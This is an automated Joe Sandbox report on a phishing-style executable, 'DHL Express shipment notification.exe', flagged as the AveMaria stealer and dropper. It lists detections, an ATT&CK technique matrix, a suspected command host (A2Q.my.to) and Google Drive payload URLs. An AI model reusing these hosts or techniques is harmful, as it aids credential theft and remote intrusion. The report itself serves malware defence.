Source: explorer.exe, 0000000F.00000000.911476901.0000000000B59000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000000.960926581.0000000000B59000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000002.5653330376.0000000000B59000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\ProgramData\images.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: DHL Express shipment notification.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: images.exe PID: 8428, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Express shipment notification.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: images.exe PID: 8428, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Registry Run Keys / Startup Folder1	Process Injection412	Masquerading3	Input Capture111	Security Software Discovery421	Remote Services	Input Capture111	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Endpoint Denial of Service1
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Registry Run Keys / Startup Folder1	Modify Registry1	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Virtualization/Sandbox Evasion22	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection412	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	System Information Discovery3	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol113	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Users1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL Express shipment notification.exe	25%	Virustotal		Browse
DHL Express shipment notification.exe	11%	ReversingLabs	Win32.Trojan.Shelsy

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\images.exe	25%	Virustotal		Browse
C:\ProgramData\images.exe	11%	ReversingLabs	Win32.Trojan.Shelsy

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.0.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.0.DHL Express shipment notification.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
29.0.images.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
29.0.images.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.3.DHL Express shipment notification.exe.1a02148.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
39.2.cmd.exe.4f80000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.0.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.0.DHL Express shipment notification.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.0.DHL Express shipment notification.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
5.2.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
21.0.images.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
21.2.images.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
29.0.images.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082	Download File
14.3.DHL Express shipment notification.exe.1a02148.4.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
29.0.images.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1140082	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	0%	Virustotal		Browse
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
docs.google.com	142.250.186.78	true	false	high
A2Q.my.to	194.85.248.156	true	false	high
drive.google.com	142.250.185.206	true	false	high
googlehosted.l.googleusercontent.com	216.58.212.161	true	false	high
doc-10-6k-docs.googleusercontent.com	unknown	unknown	false	high
doc-0c-74-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download	false	high
https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2	false	high
https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn	false	high
https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000F.00000000.987052343.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5702840793.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935402531.000000000D954000.00000004.00000001.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe549	DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://doc-0c-74-docs.googleusercontent.com/#9	images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://doc-0c-74-docs.googleusercontent.com/	images.exe, 0000001D.00000003.1347566980.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330644774.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	false		high
http://www.foreca.com	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000F.00000000.976658395.0000000009B50000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.926660869.000000000A7E0000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.914833980.0000000002FA0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidum	images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	false		high
https://aka.ms/odirm	explorer.exe, 0000000F.00000000.972782863.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.922114611.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5684842071.000000000950F000.00000004.00000001.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/	DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/XM	DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	false		high
http://www.google.com/support/accounts/answer/151657?hl=en	images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322042045.00000000018AA000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330432531.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	false		high
https://api.msn.com/g	explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	false		high
https://drive.google.com/	DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	false		high
https://doc-10-6k-docs.googleusercontent.com/%%doc-10-6k-docs.googleusercontent.com	DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	false		high
https://api.msn.com/	explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	false		high
https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleuserco	images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	false		high
https://windows.msn.com:443/shell	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://drive.google.com/(	DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeperC:	DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	docs.google.com	United States	15169	GOOGLEUS	false
142.250.185.206	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.161	unknown	United States	15169	GOOGLEUS	false
194.85.248.156	A2Q.my.to	Russian Federation	35478	DATACENTERRO	false
216.58.212.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
93.184.220.29	unknown	European Union	15133	EDGECASTUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532143
Start date:	01.12.2021
Start time:	19:21:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 10s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DHL Express shipment notification.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.evad.winEXE@15/2@6/6
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, IntelPTTEKRecertification.exe, BackgroundTransferHost.exe, HxTsr.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.54.122.82 Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, login.live.com, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:25:09	Task Scheduler	Run new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
19:26:26	API Interceptor	3905x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.85.248.156	Statement from QNB.exe	Get hash	malicious	Browse
93.184.220.29	kr.ps1	Get hash	malicious	Browse	/
93.184.220.29	SecuredFolder.htm	Get hash	malicious	Browse	status.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQnt%2BO7KdI35ubyUVwz39VP7XeuiQQU5wH8DBYYyn2yjOyHJ6NvYYE7hDkCEAghIHE0ISqj0Gwb1T5M8Uc%3D

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DATACENTERRO	Scan5190876.exe	Get hash	malicious	Browse	194.85.248.87
	fSK3Q4jYT1.rtf	Get hash	malicious	Browse	194.85.248.219
	PO20201120 PACKING LIST INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	194.85.248.219
	RFQ.exe	Get hash	malicious	Browse	194.85.248.250
	AOSzenmA46.exe	Get hash	malicious	Browse	194.85.248.219
	order.xlsx	Get hash	malicious	Browse	194.85.248.167
	8L9Jch9mPn.exe	Get hash	malicious	Browse	194.85.248.167
	l4CkRwSH9q.exe	Get hash	malicious	Browse	194.85.248.167
	B88hJ0hfMG.exe	Get hash	malicious	Browse	194.85.248.219
	Invoice.exe	Get hash	malicious	Browse	194.85.248.87
	Dhl_AWB5032675620,pdf.exe	Get hash	malicious	Browse	194.85.248.114
	CFfGUQZJoe.rtf	Get hash	malicious	Browse	194.85.248.219
	GlobeMed-Network-2020.docx	Get hash	malicious	Browse	194.85.248.219
	CV.exe	Get hash	malicious	Browse	194.85.248.250
	juju.exe	Get hash	malicious	Browse	194.85.248.167
	RV-PI2021-ORDERSXV488.xlsx	Get hash	malicious	Browse	194.85.248.167
	CDCB-PKG04-2573-2021 -TRANSGLOBAL.xlsx	Get hash	malicious	Browse	194.85.248.219
	NYkIPZIEzB.exe	Get hash	malicious	Browse	194.85.248.219
	1jH2FM5OI8.exe	Get hash	malicious	Browse	194.85.248.167
	mTWpnH3Cve.exe	Get hash	malicious	Browse	194.85.248.167
EDGECASTUS	mp3_Message_wav_###JBTDKV.HTM	Get hash	malicious	Browse	152.199.23.72
	ATT14851.html	Get hash	malicious	Browse	152.199.23.37
	WMHighfield.html	Get hash	malicious	Browse	152.199.21.175
	phish.htm	Get hash	malicious	Browse	152.199.21.175
	html.html	Get hash	malicious	Browse	152.199.23.37
	#Ud83d#Udce9-susan.hinds6459831.htm	Get hash	malicious	Browse	152.199.23.37
	phish.htm	Get hash	malicious	Browse	152.199.21.175
	ph.htm	Get hash	malicious	Browse	152.199.21.175
	forensic_challenge(1).html	Get hash	malicious	Browse	93.184.220.70
	Download_Statement_(0 seconds).htm	Get hash	malicious	Browse	152.199.23.37
	Download_Statement_.htm	Get hash	malicious	Browse	152.199.23.37
	Statement.html	Get hash	malicious	Browse	152.199.23.37
	PO 4500151298 SIAM RRJ 38 2.exe	Get hash	malicious	Browse	93.184.216.34
	Pay App #8- Change Order.html	Get hash	malicious	Browse	192.229.221.185
	Fax059-j.metternich-SwiftMT109-INV.html	Get hash	malicious	Browse	152.199.23.37
	Fax059-j.metternich-SwiftMT109-INV.html	Get hash	malicious	Browse	152.199.23.37
	WMHighfield.html	Get hash	malicious	Browse	152.199.21.175
	Statement.html	Get hash	malicious	Browse	152.199.23.37
	Michal November 23, 2021.html	Get hash	malicious	Browse	152.199.23.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Transferencia_29_11_2021 17.03.39.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	part-1500645108.xlsb	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	gXphSPTf52.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	VM845.html	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	Rl3M5OSf6P.exe	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
	#U0192#U0e25#U00a2_#U0192#U03b1#U0aee#U01ad#U00b5#U0ae8#U03b1_#U05e0jumozeK_Yim73678.vbs	Get hash	malicious	Browse	142.250.186.78 216.58.212.161 142.250.185.206 142.250.185.161
